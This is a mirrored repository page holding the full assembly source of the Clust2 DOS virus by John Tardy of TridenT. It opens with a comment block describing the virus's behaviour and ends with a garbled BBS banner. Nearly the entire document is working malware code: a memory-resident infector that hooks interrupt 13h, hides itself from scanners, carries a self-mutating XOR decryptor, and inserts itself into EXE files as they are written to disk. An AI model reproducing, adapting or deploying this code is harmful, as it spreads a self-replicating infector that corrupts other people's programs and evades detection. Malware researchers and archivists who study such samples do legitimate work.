mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-22 01:58:51 +00:00
4b9382ddbc
push
250 lines
5.3 KiB
NASM
250 lines
5.3 KiB
NASM
;
|
||
; Clust2 virus by John Tardy / TridenT
|
||
;
|
||
; Virus Name: Clust2
|
||
; Aliases: Cluster-II, Circus Clusters-II
|
||
; V Status: Released
|
||
; Discovery: Not (yet)
|
||
; Symptoms: .EXE altered, possible "sector not found" errors on disk-drives,
|
||
; decrease in aveable memory
|
||
; Origin: The Netherlands
|
||
; Eff Length: 386 bytes (EXE size doesn't change)
|
||
; Type Code: ORhE - Overwriting Resident .EXE Infector
|
||
; Detection Method:
|
||
; Removal Instructions: Delete infected files or copy infected files with the
|
||
; virus resident to a device driven unit.
|
||
;
|
||
; General Comments:
|
||
; The Clust2 virus is not yet submitted to any antiviral authority. It
|
||
; is from the TridenT Virus Research Centre and was written by someone
|
||
; calling himself John Tardy. When an infected program is started, Clust2
|
||
; will become resident in high memory, but below TOM. It hooks interrupt
|
||
; 13h and will try to load the program again. Because of it's stealth
|
||
; abilities the original program is loaded and will execute normally.
|
||
; The Clust2 virus infects files when a write request for interrupt 13h
|
||
; is done. It will check if the buffer contains the 'MZ' signature and
|
||
; that the candidate file isn't larger than 65000 bytes, and if there are
|
||
; enough zeros in the EXE-header. If these contidions are met, Clust2
|
||
; will convert the EXE file to a COM file and inserts it's code in the
|
||
; buffer, allowing the original write request to proceed. This way it
|
||
; evades critical errors. The Clust2 virus is also stealth and can't be
|
||
; detected with virus scanners or checksumming software if the virus is
|
||
; resident. File-length and date doesn't change regardless if Clust2
|
||
; is resident. It's also a slighty polymorphic virus, mutating a few
|
||
; bytes in it's decryptor. A wildcarded string is needed to find it.
|
||
; The following text is encrypted within the
|
||
; virus:
|
||
;
|
||
; "[Clust2]"
|
||
; "JT / TridenT"
|
||
;
|
||
; The Clust2 virus not infect files on device driven units, like drives
|
||
; compressed with DoubleSpace. It will disinfect when copied to such a
|
||
; device.
|
||
;
|
||
; Sometimes it will issue a "sector not found" error when a file is
|
||
; copied to a disk drive.
|
||
;
|
||
; The Clust2 virus doesn't do anything besides replicating.
|
||
;
|
||
ORG 100H
|
||
|
||
JUMPIE: JMP SHORT JUMPER
|
||
|
||
ORG 180H
|
||
|
||
JUMPER: CLC
|
||
MOV CX,DECRLEN
|
||
MORPH EQU $-2
|
||
JASS: LEA SI,DECR
|
||
DECRYPT: XOR BYTE PTR [SI],0
|
||
TRIG EQU $-1
|
||
TRAG EQU $-2
|
||
TROG: INC SI
|
||
TREG: LOOP DECRYPT
|
||
|
||
DECR: MOV AX,3513H
|
||
INT 21H
|
||
MOV OLD13,BX
|
||
MOV OLD13[2],ES
|
||
MOV AX,ES:[BX]
|
||
CMP AX,0FC80H
|
||
JE EXIT
|
||
|
||
DOINST: MOV AH,0DH
|
||
INT 21H
|
||
|
||
MOV AX,CS
|
||
DEC AX
|
||
MOV DS,AX
|
||
CMP BYTE PTR DS:[0],'Z'
|
||
JNE EXIT
|
||
RESIT: SUB WORD PTR DS:[3],VIRPAR+19H
|
||
SUB WORD PTR DS:[12H],VIRPAR+19H
|
||
LEA SI,JUMPER
|
||
MOV DI,SI
|
||
MOV ES,DS:[12H]
|
||
MOV DS,CS
|
||
MOV CX,VIRLEN
|
||
REP MOVSB
|
||
|
||
MOV AX,2513H
|
||
MOV DS,ES
|
||
LEA DX,NEW13
|
||
INT 21H
|
||
|
||
PUSH CS
|
||
POP ES
|
||
MOV BX,100H
|
||
MOV SP,BX
|
||
MOV AH,4AH
|
||
INT 21H
|
||
PUSH CS
|
||
POP DS
|
||
MOV BX,DS:[2CH]
|
||
MOV ES,BX
|
||
MOV AH,49H
|
||
INT 21H
|
||
|
||
XOR AX,AX
|
||
MOV DI,1
|
||
SEEK: DEC DI
|
||
SCASW
|
||
JNE SEEK
|
||
|
||
LEA SI,DS:[DI+2]
|
||
EXEC: PUSH BX
|
||
PUSH CS
|
||
POP DS
|
||
MOV BX,OFFSET PARAM
|
||
MOV DS:[BX+4],CS
|
||
MOV DS:[BX+8],CS
|
||
MOV DS:[BX+12],CS
|
||
POP DS
|
||
PUSH CS
|
||
POP ES
|
||
|
||
MOV DI,OFFSET FILENAME
|
||
PUSH DI
|
||
MOV CX,40
|
||
REP MOVSW
|
||
PUSH CS
|
||
POP DS
|
||
|
||
POP DX
|
||
|
||
MOV AX,4B00H
|
||
INT 21H
|
||
EXIT: MOV AH,4DH
|
||
INT 21H
|
||
MOV AH,4CH
|
||
INT 21H
|
||
|
||
OLD13 DW 0,0
|
||
|
||
ORG13: JMP D CS:[OLD13]
|
||
|
||
NEW13: CMP AH,3
|
||
JE CHECKEXE
|
||
CMP AH,2
|
||
JNE ORG13
|
||
DO: PUSHF
|
||
CALL D CS:[OLD13]
|
||
CMP ES:[BX],7EEBH
|
||
JNE ERROR
|
||
MOV ES:[BX],'ZM'
|
||
PUSH DI
|
||
PUSH CX
|
||
PUSH AX
|
||
|
||
MOV CX,VIRLEN
|
||
XOR AX,AX
|
||
LEA DI,BX[80H]
|
||
REP STOSB
|
||
|
||
POP AX
|
||
POP CX
|
||
POP DI
|
||
ERROR: IRET
|
||
|
||
CHECKEXE: CMP ES:[BX],'ZM'
|
||
JNE ORG13
|
||
|
||
CMP W ES:BX[4],(65000/512)
|
||
JNB ORG13
|
||
|
||
PUSH AX
|
||
PUSH CX
|
||
PUSH SI
|
||
PUSH DI
|
||
PUSH DS
|
||
|
||
PUSH ES
|
||
POP DS
|
||
LEA SI,BX[80H]
|
||
MOV DI,SI
|
||
MOV CX,VIRLEN
|
||
FIND0: LODSB
|
||
OR AL,AL
|
||
LOOPE FIND0
|
||
OR CX,CX
|
||
JNE NO0
|
||
|
||
XOR AX,AX
|
||
MOV DS,AX
|
||
MOV AX,DS:[046CH]
|
||
PUSH CS
|
||
POP DS
|
||
TEST AH,1
|
||
JZ NOLOOPFLIP
|
||
XOR B TREG,2
|
||
NOLOOPFLIP: TEST AH,2
|
||
JZ NOCLCFLIP
|
||
XOR B JUMPER,1
|
||
NOCLCFLIP:
|
||
ADD AX,VIRLEN
|
||
SHR AX,1
|
||
MOV W MORPH,AX
|
||
MOV B TRIG,AH
|
||
XOR B TRAG,1
|
||
XOR B JASS,1
|
||
XOR B TROG,1
|
||
MOV CX,CRYPT
|
||
LEA SI,JUMPER
|
||
REP MOVSB
|
||
MOV CX,DECRLEN
|
||
LEA SI,DECR
|
||
CODEIT: LODSB
|
||
XOR AL,AH
|
||
STOSB
|
||
LOOP CODEIT
|
||
MOV DI,BX
|
||
MOV AX,07EEBH
|
||
STOSW
|
||
|
||
NO0: POP DS
|
||
POP DI
|
||
POP SI
|
||
POP CX
|
||
POP AX
|
||
JMP ORG13
|
||
|
||
DB '[Clust2]'
|
||
|
||
PARAM DW 0,80H,?,5CH,?,6CH,?
|
||
|
||
DB 'JT / TridenT'
|
||
|
||
FILENAME EQU $
|
||
DECRLEN EQU $-DECR
|
||
CRYPT EQU DECR-JUMPER
|
||
VIRLEN EQU $-JUMPER
|
||
VIRPAR EQU ($-JUMPER)/16
|
||
|
||
|
||
|
||
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> ReMeMbEr WhErE YoU sAw ThIs pHile fIrSt <<3C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> ArReStEd DeVeLoPmEnT +31.77.SeCrEt H/p/A/v/AV/? <<3C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|